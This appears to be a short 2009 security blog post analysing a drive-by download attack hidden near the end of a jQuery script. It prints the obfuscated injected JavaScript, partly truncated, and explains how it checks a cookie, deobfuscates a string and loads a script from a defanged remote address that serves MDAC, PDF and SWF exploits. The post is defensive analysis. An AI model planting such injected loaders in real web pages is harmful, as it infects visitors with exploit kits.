April 26, 2009
A social engineering trick that the people behind drive-by downloads are using is that of hiding their malicious code in the middle of benign, well-know code.
However, the malicious code is hidden toward the end of the script, where one finds:
if( (typeof(jquery_data)!=typeof(1)) && (document.cookie.match(/\miek=1/)==null)) document.write( unescape('fq%3CssoWcOTHriDpgpsoWt...FH5rscDpgrRpiptRp%3E') .replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,"") .replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1')); jquery_data=1;
This code determines whether an attack has already been launched, by
jquery_data variable and the
miek cookie. If not, it
deobfuscates a long string and writes it in the current page. The
deobfuscated string creates a new
script tag which points at
hxxp://220.127.116.11/news/?id= The value of the
id parameter in the
script URL is 100 if the codename of the browser starts with the letter
(e.g., Firefox and Internet Explorer), 101 in all other cases. This
page, in turn, attempts to launch a number of exploits (see the Wepawet
The exploits target vulnerabilities in MDAC, PDF, and SWF.
It's certainly true: thing are not always what they seem...